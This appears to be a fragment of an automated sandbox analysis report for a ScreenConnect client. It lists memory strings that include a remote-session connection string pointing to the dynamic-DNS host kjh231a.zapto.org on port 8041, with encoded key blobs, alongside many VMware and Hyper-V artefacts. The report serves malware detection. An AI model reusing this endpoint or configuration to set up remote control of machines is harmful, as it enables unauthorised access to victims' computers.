                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\Jump to behavior
                  Source: Amcache.hve.6.drBinary or memory string: VMware
                  Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001201000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAqHcYWWhYxk2TTZ0IUUwtAgAAAAACAAAAAAAQZgAAAAEAACAAAAA8RpQg4oVFt9XPJUqpRcLW3DIrmMd0AaOuiVw%2fGXINGgAAAAAOgAAAAAIAACAAAACCdOZgHqpMcodqURrATYqRaZ4JQtghWNz8cMf6Hht5OaAEAADkPzZ5KvtcppXqUipZJdeh0dLZKHX8xGwn55uGAFs3AvjhhrIcVvhoZdVrWG8EwKBPp3RQ%2bdGeg%2fcuTe0Hgq7TG8W0lgWTvrMRkGNR%2bUk2SQeBVYOuLlSGV1nqSHvAI6FNozpNsPfRWTNYbOqmqSXg9i60jlJrMYXulGpJblT3x1F2BFUhsn3DLm1J87nUrkBx%2bhJHRl0q4uYV2WTaCEGX4f9COqXCkBPMr9Jvr2yHYT48hoDtAY54Ue2PS%2f8e9hNYkjAiYY7dA9B5rdqaYikmhJEFlf0%2b2hq5N%2fYBnoRL8ZUJKaCpoGMX7xbyLKBpU1hDpPgV5boa2Ph8nXgxqOYU1CHbYcHatfrGy3LOwcVkM9yP3awjcm%2bksXISEhgBOZpm6uObIeQZtRuea2IPlZyZqqfuPciCcj4Z%2fb99T0T9qhzCCN4g6kostExDRqpg0RVP3BwUhh7yerLoJgd%2ftni%2fTbVUED66WGCbeKfS7VZTSUsdmg7EwOa9gElUHjNYksS2QNWQWVBadhHIPj9ppLdv6Jl2m8Efemrrcv4UJcJoHUYQq%2fqw0jEx2qEtsj1A0i4UpbRkrf1HzVKOf2U1rQFkBEgTSTnldv3zyCmNxfSz3tK3Qfyp2mzxRDVnvDeEtzwfZZALz%2bs7k76sCavOBFusk7B9%2fer%2b6fuzXJGdHn%2b0nrha9T95dI9YwA9AMFbz76jd%2fnrrIVqAUpJEfY1sfQLULMYXjFOaVvmtukTmBbLY1sYXIaR6zrTdwBLDRVc3bY2ShCuTOH5PQHQIapWygT37GTq68oi%2b6Dda6yhq%2fyXOd8T%2by41IeuOwRDyuJMPpfBQTsAJ0827u9dksK7UBhB2AXvyezcpuiTv%2f8zRvkRagmbBiK9pe9dAbbpaBMRD8pAdotjVDW5fJ9sfV2nHnHLJ9sDPBGTEy%2fkzjr6AfBe%2fdg45Om2pU6B4DxLn%2fv%2fqwYed548Qj6TB6o0COi24fHizlGPc%2bcfR0SbTgLl4avKsNur7DydrHV1HQTm7ZaTZx14iJQ2%2b8Rj3DMXov8JNlZcQvcyWugYXdt0c%2fYRBjsTKtGBCM06rpYs2BXcY3gBPle%2fMcm%2fphZipIpXAsqVaA8FC2fe5frvFojbT7Fr%2fKsUXp6brNP65sBjrp5CEELNTP71wQJR8e4QW7POdg2sPW2duEDagVur8Z%2fTq3IpdBotASVtA%2fy93iotYmUFJ2Pqq2HhMyG%2fSCBRUHcW4EUd393OAIuLy4ofjR%2b0Pe%2bkhd%2fGnueYhyuAVOjWMjPLxX4jpjkef5gJMjB8I00geWxeOSi%2bLGb42tVUwaibLbLLKKTNOsg8XZdUEP5NhZgIWlFytQ4uIyXwpcXYYpYKTaLR1V6kY2VuTXMcBqvmadraa3uqXqemUkhsF5ZQbREd47%2bSoo6ne3zAVNteDJnfv7IAwbSwOB%2bB1ODuP31NWONE%2bTHgMHQNtGxaf1JEIZsPsd8MwtR4J11oD7kE5asaRj4s1W21pi5CUpRXO87k%2bkRTOkAesVozYVKbs1%2faCV6RXLb69M9YMHxNHsKElL0UrEYr50aw5exOuW8%2f%2fhXM1dH%2faXcBM7n0AAAACz8BeRgb%2fOBzs7iBHxh2WBDwOYoDUImIyOSubXC8JfgkRG2dsngc9c1uFkbPP9rh7T8m%2fVIse9uv1s4dpHi%2bXM&r=&i=Untitled%2520Session
                  Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000002.00000002.2256734540.00000276A4261000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2252252771.00000276A2AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2610724033.0000025CF7A57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608059765.000001CEA28D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001201000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAqHcYWWhYxk2TTZ0IUUwtAgAAAAACAAAAAAAQZgAAAAEAACAAAAA8RpQg4oVFt9XPJUqpRcLW3DIrmMd0AaOuiVw%2fGXINGgAAAAAOgAAAAAIAACAAAACCdOZgHqpMcodqURrATYqRaZ4JQtghWNz8cMf6Hht5OaAEAADkPzZ5KvtcppXqUipZJdeh0dLZKHX8xGwn55uGAFs3AvjhhrIcVvhoZdVrWG8EwKBPp3RQ%2bdGeg%2fcuTe0Hgq7TG8W0lgWTvrMRkGNR%2bUk2SQeBVYOuLlSGV1nqSHvAI6FNozpNsPfRWTNYbOqmqSXg9i60jlJrMYXulGpJblT3x1F2BFUhsn3DLm1J87nUrkBx%2bhJHRl0q4uYV2WTaCEGX4f9COqXCkBPMr9Jvr2yHYT48hoDtAY54Ue2PS%2f8e9hNYkjAiYY7dA9B5rdqaYikmhJEFlf0%2b2hq5N%2fYBnoRL8ZUJKaCpoGMX7xbyLKBpU1hDpPgV5boa2Ph8nXgxqOYU1CHbYcHatfrGy3LOwcVkM9yP3awjcm%2bksXISEhgBOZpm6uObIeQZtRuea2IPlZyZqqfuPciCcj4Z%2fb99T0T9qhzCCN4g6kostExDRqpg0RVP3BwUhh7yerLoJgd%2ftni%2fTbVUED66WGCbeKfS7VZTSUsdmg7EwOa9gElUHjNYksS2QNWQWVBadhHIPj9ppLdv6Jl2m8Efemrrcv4UJcJoHUYQq%2fqw0jEx2qEtsj1A0i4UpbRkrf1HzVKOf2U1rQFkBEgTSTnldv3zyCmNxfSz3tK3Qfyp2mzxRDVnvDeEtzwfZZALz%2bs7k76sCavOBFusk7B9%2fer%2b6fuzXJGdHn%2b0nrha9T95dI9YwA9AMFbz76jd%2fnrrIVqAUpJEfY1sfQLULMYXjFOaVvmtukTmBbLY1sYXIaR6zrTdwBLDRVc3bY2ShCuTOH5PQHQIapWygT37GTq68oi%2b6Dda6yhq%2fyXOd8T%2by41IeuOwRDyuJMPpfBQTsAJ0827u9dksK7UBhB2AXvyezcpuiTv%2f8zRvkRagmbBiK9pe9dAbbpaBMRD8pAdotjVDW5fJ9sfV2nHnHLJ9sDPBGTEy%2fkzjr6AfBe%2fdg45Om2pU6B4DxLn%2fv%2fqwYed548Qj6TB6o0COi24fHizlGPc%2bcfR0SbTgLl4avKsNur7DydrHV1HQTm7ZaTZx14iJQ2%2b8Rj3DMXov8JNlZcQvcyWugYXdt0c%2fYRBjsTKtGBCM06rpYs2BXcY3gBPle%2fMcm%2fphZipIpXAsqVaA8FC2fe5frvFojbT7Fr%2fKsUXp6brNP65sBjrp5CEELNTP71wQJR8e4QW7POdg2sPW2duEDagVur8Z%2fTq3IpdBotASVtA%2fy93iotYmUFJ2Pqq2HhMyG%2fSCBRUHcW4EUd393OAIuLy4ofjR%2b0Pe%2bkhd%2fGnueYhyuAVOjWMjPLxX4jpjkef5gJMjB8I00geWxeOSi%2bLGb42tVUwaibLbLLKKTNOsg8XZdUEP5NhZgIWlFytQ4uIyXwpcXYYpYKTaLR1V6kY2VuTXMcBqvmadraa3uqXqemUkhsF5ZQbREd47%2bSoo6ne3zAVNteDJnfv7IAwbSwOB%2bB1ODuP31NWONE%2bTHgMHQNtGxaf1JEIZsPsd8MwtR4J11oD7kE5asaRj4s1W21pi5CUpRXO87k%2bkRTOkAesVozYVKbs1%2faCV6RXLb69M9YMHxNHsKElL0UrEYr50aw5exOuW8%2f%2fhXM1dH%2faXcBM7n0AAAACz8BeRgb%2fOBzs7iBHxh2WBDwOYoDUImIyOSubXC8JfgkRG2dsngc9c1uFkbPP9rh7T8m%2fVIse9uv1s4dpHi%2bXM&r=&i=Untitled%2520Session"
                  Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001201000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAqHcYWWhYxk2TTZ0IUUwtAgAAAAACAAAAAAAQZgAAAAEAACAAAAA8RpQg4oVFt9XPJUqpRcLW3DIrmMd0AaOuiVw%2fGXINGgAAAAAOgAAAAAIAACAAAACCdOZgHqpMcodqURrATYqRaZ4JQtghWNz8cMf6Hht5OaAEAADkPzZ5KvtcppXqUipZJdeh0dLZKHX8xGwn55uGAFs3AvjhhrIcVvhoZdVrWG8EwKBPp3RQ%2bdGeg%2fcuTe0Hgq7TG8W0lgWTvrMRkGNR%2bUk2SQeBVYOuLlSGV1nqSHvAI6FNozpNsPfRWTNYbOqmqSXg9i60jlJrMYXulGpJblT3x1F2BFUhsn3DLm1J87nUrkBx%2bhJHRl0q4uYV2WTaCEGX4f9COqXCkBPMr9Jvr2yHYT48hoDtAY54Ue2PS%2f8e9hNYkjAiYY7dA9B5rdqaYikmhJEFlf0%2b2hq5N%2fYBnoRL8ZUJKaCpoGMX7xbyLKBpU1hDpPgV5boa2Ph8nXgxqOYU1CHbYcHatfrGy3LOwcVkM9yP3awjcm%2bksXISEhgBOZpm6uObIeQZtRuea2IPlZyZqqfuPciCcj4Z%2fb99T0T9qhzCCN4g6kostExDRqpg0RVP3BwUhh7yerLoJgd%2ftni%2fTbVUED66WGCbeKfS7VZTSUsdmg7EwOa9gElUHjNYksS2QNWQWVBadhHIPj9ppLdv6Jl2m8Efemrrcv4UJcJoHUYQq%2fqw0jEx2qEtsj1A0i4UpbRkrf1HzVKOf2U1rQFkBEgTSTnldv3zyCmNxfSz3tK3Qfyp2mzxRDVnvDeEtzwfZZALz%2bs7k76sCavOBFusk7B9%2fer%2b6fuzXJGdHn%2b0nrha9T95dI9YwA9AMFbz76jd%2fnrrIVqAUpJEfY1sfQLULMYXjFOaVvmtukTmBbLY1sYXIaR6zrTdwBLDRVc3bY2ShCuTOH5PQHQIapWygT37GTq68oi%2b6Dda6yhq%2fyXOd8T%2by41IeuOwRDyuJMPpfBQTsAJ0827u9dksK7UBhB2AXvyezcpuiTv%2f8zRvkRagmbBiK9pe9dAbbpaBMRD8pAdotjVDW5fJ9sfV2nHnHLJ9sDPBGTEy%2fkzjr6AfBe%2fdg45Om2pU6B4DxLn%2fv%2fqwYed548Qj6TB6o0COi24fHizlGPc%2bcfR0SbTgLl4avKsNur7DydrHV1HQTm7ZaTZx14iJQ2%2b8Rj3DMXov8JNlZcQvcyWugYXdt0c%2fYRBjsTKtGBCM06rpYs2BXcY3gBPle%2fMcm%2fphZipIpXAsqVaA8FC2fe5frvFojbT7Fr%2fKsUXp6brNP65sBjrp5CEELNTP71wQJR8e4QW7POdg2sPW2duEDagVur8Z%2fTq3IpdBotASVtA%2fy93iotYmUFJ2Pqq2HhMyG%2fSCBRUHcW4EUd393OAIuLy4ofjR%2b0Pe%2bkhd%2fGnueYhyuAVOjWMjPLxX4jpjkef5gJMjB8I00geWxeOSi%2bLGb42tVUwaibLbLLKKTNOsg8XZdUEP5NhZgIWlFytQ4uIyXwpcXYYpYKTaLR1V6kY2VuTXMcBqvmadraa3uqXqemUkhsF5ZQbREd47%2bSoo6ne3zAVNteDJnfv7IAwbSwOB%2bB1ODuP31NWONE%2bTHgMHQNtGxaf1JEIZsPsd8MwtR4J11oD7kE5asaRj4s1W21pi5CUpRXO87k%2bkRTOkAesVozYVKbs1%2faCV6RXLb69M9YMHxNHsKElL0UrEYr50aw5exOuW8%2f%2fhXM1dH%2faXcBM7n0AAAACz8BeRgb%2fOBzs7iBHxh2WBDwOYoDUImIyOSubXC8JfgkRG2dsngc9c1uFkbPP9rh7T8m%2fVIse9uv1s4dpHi%2bXMLR_qx
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001201000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAqHcYWWhYxk2TTZ0IUUwtAgAAAAACAAAAAAAQZgAAAAEAACAAAAA8RpQg4oVFt9XPJUqpRcLW3DIrmMd0AaOuiVw/GXINGgAAAAAOgAAAAAIAACAAAACCdOZgHqpMcodqURrATYqRaZ4JQtghWNz8cMf6Hht5OaAEAADkPzZ5KvtcppXqUipZJdeh0dLZKHX8xGwn55uGAFs3AvjhhrIcVvhoZdVrWG8EwKBPp3RQ+dGeg/cuTe0Hgq7TG8W0lgWTvrMRkGNR+Uk2SQeBVYOuLlSGV1nqSHvAI6FNozpNsPfRWTNYbOqmqSXg9i60jlJrMYXulGpJblT3x1F2BFUhsn3DLm1J87nUrkBx+hJHRl0q4uYV2WTaCEGX4f9COqXCkBPMr9Jvr2yHYT48hoDtAY54Ue2PS/8e9hNYkjAiYY7dA9B5rdqaYikmhJEFlf0+2hq5N/YBnoRL8ZUJKaCpoGMX7xbyLKBpU1hDpPgV5boa2Ph8nXgxqOYU1CHbYcHatfrGy3LOwcVkM9yP3awjcm+ksXISEhgBOZpm6uObIeQZtRuea2IPlZyZqqfuPciCcj4Z/b99T0T9qhzCCN4g6kostExDRqpg0RVP3BwUhh7yerLoJgd/tni/TbVUED66WGCbeKfS7VZTSUsdmg7EwOa9gElUHjNYksS2QNWQWVBadhHIPj9ppLdv6Jl2m8Efemrrcv4UJcJoHUYQq/qw0jEx2qEtsj1A0i4UpbRkrf1HzVKOf2U1rQFkBEgTSTnldv3zyCmNxfSz3tK3Qfyp2mzxRDVnvDeEtzwfZZALz+s7k76sCavOBFusk7B9/er+6fuzXJGdHn+0nrha9T95dI9YwA9AMFbz76jd/nrrIVqAUpJEfY1sfQLULMYXjFOaVvmtukTmBbLY1sYXIaR6zrTdwBLDRVc3bY2ShCuTOH5PQHQIapWygT37GTq68oi+6Dda6yhq/yXOd8T+y41IeuOwRDyuJMPpfBQTsAJ0827u9dksK7UBhB2AXvyezcpuiTv/8zRvkRagmbBiK9pe9dAbbpaBMRD8pAdotjVDW5fJ9sfV2nHnHLJ9sDPBGTEy/kzjr6AfBe/dg45Om2pU6B4DxLn/v/qwYed548Qj6TB6o0COi24fHizlGPc+cfR0SbTgLl4avKsNur7DydrHV1HQTm7ZaTZx14iJQ2+8Rj3DMXov8JNlZcQvcyWugYXdt0c/YRBjsTKtGBCM06rpYs2BXcY3gBPle/Mcm/phZipIpXAsqVaA8FC2fe5frvFojbT7Fr/KsUXp6brNP65sBjrp5CEELNTP71wQJR8e4QW7POdg2sPW2duEDagVur8Z/Tq3IpdBotASVtA/y93iotYmUFJ2Pqq2HhMyG/SCBRUHcW4EUd393OAIuLy4ofjR+0Pe+khd/GnueYhyuAVOjWMjPLxX4jpjkef5gJMjB8I00geWxeOSi+LGb42tVUwaibLbLLKKTNOsg8XZdUEP5NhZgIWlFytQ4uIyXwpcXYYpYKTaLR1V6kY2VuTXMcBqvmadraa3uqXqemUkhsF5ZQbREd47+Soo6ne3zAVNteDJnfv7IAwbSwOB+B1ODuP31NWONE+THgMHQNtGxaf1JEIZsPsd8MwtR4J11oD7kE5asaRj4s1W21pi5CUpRXO87k+kRTOkAesVozYVKbs1/aCV6RXLb69M9YMHxNHsKElL0UrEYr50aw5exOuW8//hXM1dH/aXcBM7n0AAAACz8BeRgb/OBzs7iBHxh2WBDwOYoDUImIyOSubXC8JfgkRG2dsngc9c1uFkbPP9rh7T8m/VIse9uv1s4dpHi+XM
                  Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1790695435.0000000000ACF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001201000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAqHcYWWhYxk2TTZ0IUUwtAgAAAAACAAAAAAAQZgAAAAEAACAAAAA8RpQg4oVFt9XPJUqpRcLW3DIrmMd0AaOuiVw%2fGXINGgAAAAAOgAAAAAIAACAAAACCdOZgHqpMcodqURrATYqRaZ4JQtghWNz8cMf6Hht5OaAEAADkPzZ5KvtcppXqUipZJdeh0dLZKHX8xGwn55uGAFs3AvjhhrIcVvhoZdVrWG8EwKBPp3RQ%2bdGeg%2fcuTe0Hgq7TG8W0lgWTvrMRkGNR%2bUk2SQeBVYOuLlSGV1nqSHvAI6FNozpNsPfRWTNYbOqmqSXg9i60jlJrMYXulGpJblT3x1F2BFUhsn3DLm1J87nUrkBx%2bhJHRl0q4uYV2WTaCEGX4f9COqXCkBPMr9Jvr2yHYT48hoDtAY54Ue2PS%2f8e9hNYkjAiYY7dA9B5rdqaYikmhJEFlf0%2b2hq5N%2fYBnoRL8ZUJKaCpoGMX7xbyLKBpU1hDpPgV5boa2Ph8nXgxqOYU1CHbYcHatfrGy3LOwcVkM9yP3awjcm%2bksXISEhgBOZpm6uObIeQZtRuea2IPlZyZqqfuPciCcj4Z%2fb99T0T9qhzCCN4g6kostExDRqpg0RVP3BwUhh7yerLoJgd%2ftni%2fTbVUED66WGCbeKfS7VZTSUsdmg7EwOa9gElUHjNYksS2QNWQWVBadhHIPj9ppLdv6Jl2m8Efemrrcv4UJcJoHUYQq%2fqw0jEx2qEtsj1A0i4UpbRkrf1HzVKOf2U1rQFkBEgTSTnldv3zyCmNxfSz3tK3Qfyp2mzxRDVnvDeEtzwfZZALz%2bs7k76sCavOBFusk7B9%2fer%2b6fuzXJGdHn%2b0nrha9T95dI9YwA9AMFbz76jd%2fnrrIVqAUpJEfY1sfQLULMYXjFOaVvmtukTmBbLY1sYXIaR6zrTdwBLDRVc3bY2ShCuTOH5PQHQIapWygT37GTq68oi%2b6Dda6yhq%2fyXOd8T%2by41IeuOwRDyuJMPpfBQTsAJ0827u9dksK7UBhB2AXvyezcpuiTv%2f8zRvkRagmbBiK9pe9dAbbpaBMRD8pAdotjVDW5fJ9sfV2nHnHLJ9sDPBGTEy%2fkzjr6AfBe%2fdg45Om2pU6B4DxLn%2fv%2fqwYed548Qj6TB6o0COi24fHizlGPc%2bcfR0SbTgLl4avKsNur7DydrHV1HQTm7ZaTZx14iJQ2%2b8Rj3DMXov8JNlZcQvcyWugYXdt0c%2fYRBjsTKtGBCM06rpYs2BXcY3gBPle%2fMcm%2fphZipIpXAsqVaA8FC2fe5frvFojbT7Fr%2fKsUXp6brNP65sBjrp5CEELNTP71wQJR8e4QW7POdg2sPW2duEDagVur8Z%2fTq3IpdBotASVtA%2fy93iotYmUFJ2Pqq2HhMyG%2fSCBRUHcW4EUd393OAIuLy4ofjR%2b0Pe%2bkhd%2fGnueYhyuAVOjWMjPLxX4jpjkef5gJMjB8I00geWxeOSi%2bLGb42tVUwaibLbLLKKTNOsg8XZdUEP5NhZgIWlFytQ4uIyXwpcXYYpYKTaLR1V6kY2VuTXMcBqvmadraa3uqXqemUkhsF5ZQbREd47%2bSoo6ne3zAVNteDJnfv7IAwbSwOB%2bB1ODuP31NWONE%2bTHgMHQNtGxaf1JEIZsPsd8MwtR4J11oD7kE5asaRj4s1W21pi5CUpRXO87k%2bkRTOkAesVozYVKbs1%2faCV6RXLb69M9YMHxNHsKElL0UrEYr50aw5exOuW8%2f%2fhXM1dH%2f`,_q
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001201000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAqHcYWWhYxk2TTZ0IUUwtAgAAAAACAAAAAAAQZgAAAAEAACAAAAA8RpQg4oVFt9XPJUqpRcLW3DIrmMd0AaOuiVw%2fGXINGgAAAAAOgAAAAAIAACAAAACCdOZgHqpMcodqURrATYqRaZ4JQtghWNz8cMf6Hht5OaAEAADkPzZ5KvtcppXqUipZJdeh0dLZKHX8xGwn55uGAFs3AvjhhrIcVvhoZdVrWG8EwKBPp3RQ%2bdGeg%2fcuTe0Hgq7TG8W0lgWTvrMRkGNR%2bUk2SQeBVYOuLlSGV1nqSHvAI6FNozpNsPfRWTNYbOqmqSXg9i60jlJrMYXulGpJblT3x1F2BFUhsn3DLm1J87nUrkBx%2bhJHRl0q4uYV2WTaCEGX4f9COqXCkBPMr9Jvr2yHYT48hoDtAY54Ue2PS%2f8e9hNYkjAiYY7dA9B5rdqaYikmhJEFlf0%2b2hq5N%2fYBnoRL8ZUJKaCpoGMX7xbyLKBpU1hDpPgV5boa2Ph8nXgxqOYU1CHbYcHatfrGy3LOwcVkM9yP3awjcm%2bksXISEhgBOZpm6uObIeQZtRuea2IPlZyZqqfuPciCcj4Z%2fb99T0T9qhzCCN4g6kostExDRqpg0RVP3BwUhh7yerLoJgd%2ftni%2fTbVUED66WGCbeKfS7VZTSUsdmg7EwOa9gElUHjNYksS2QNWQWVBadhHIPj9ppLdv6Jl2m8Efemrrcv4UJcJoHUYQq%2fqw0jEx2qEtsj1A0i4UpbRkrf1HzVKOf2U1rQFkBEgTSTnldv3zyCmNxfSz3tK3Qfyp2mzxRDVnvDeEtzwfZZALz%2bs7k76sCavOBFusk7B9%2fer%2b6fuzXJGdHn%2b0nrha9T95dI9YwA9AMFbz76jd%2fnrrIVqAUpJEfY1sfQLULMYXjFOaVvmtukTmBbLY1sYXIaR6zrTdwBLDRVc3bY2ShCuTOH5PQHQIapWygT37GTq68oi%2b6Dda6yhq%2fyXOd8T%2by41IeuOwRDyuJMPpfBQTsAJ0827u9dksK7UBhB2AXvyezcpuiTv%2f8zRvkRagmbBiK9pe9dAbbpaBMRD8pAdotjVDW5fJ9sfV2nHnHLJ9sDPBGTEy%2fkzjr6AfBe%2fdg45Om2pU6B4DxLn%2fv%2fqwYed548Qj6TB6o0COi24fHizlGPc%2bcfR0SbTgLl4avKsNur7DydrHV1HQTm7ZaTZx14iJQ2%2b8Rj3DMXov8JNlZcQvcyWugYXdt0c%2fYRBjsTKtGBCM06rpYs2BXcY3gBPle%2fMcm%2fphZipIpXAsqVaA8FC2fe5frvFojbT7Fr%2fKsUXp6brNP65sBjrp5CEELNTP71wQJR8e4QW7POdg2sPW2duEDagVur8Z%2fTq3IpdBotASVtA%2fy93iotYmUFJ2Pqq2HhMyG%2fSCBRUHcW4EUd393OAIuLy4ofjR%2b0Pe%2bkhd%2fGnueYhyuAVOjWMjPLxX4jpjkef5gJMjB8I00geWxeOSi%2bLGb42tVUwaibLbLLKKTNOsg8XZdUEP5NhZgIWlFytQ4uIyXwpcXYYpYKTaLR1V6kY2VuTXMcBqvmadraa3uqXqemUkhsF5ZQbREd47%2bSoo6ne3zAVNteDJnfv7IAwbSwOB%2bB1ODuP31NWONE%2bTHgMHQNtGxaf1JEIZsPsd8MwtR4J11oD7kE5asaRj4s1W21pi5CUpRXO87k%2bkRTOkAesVozYVKbs1%2faCV6RXLb69M9YMHxNHsKElL0UrEYr50aw5exOuW8%2f%2fhXM1dH%2faXcBM7n0AAAACz8BeRgb%2fOBzs7iBHxh2WBDwOYoDUImIyOSubXC8JfgkRG2dsngc9c1uFkbPP9rh7T8m%2fVIse9uv1s4dpHi%2bXM&r=&i=Untitled%2520Session
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
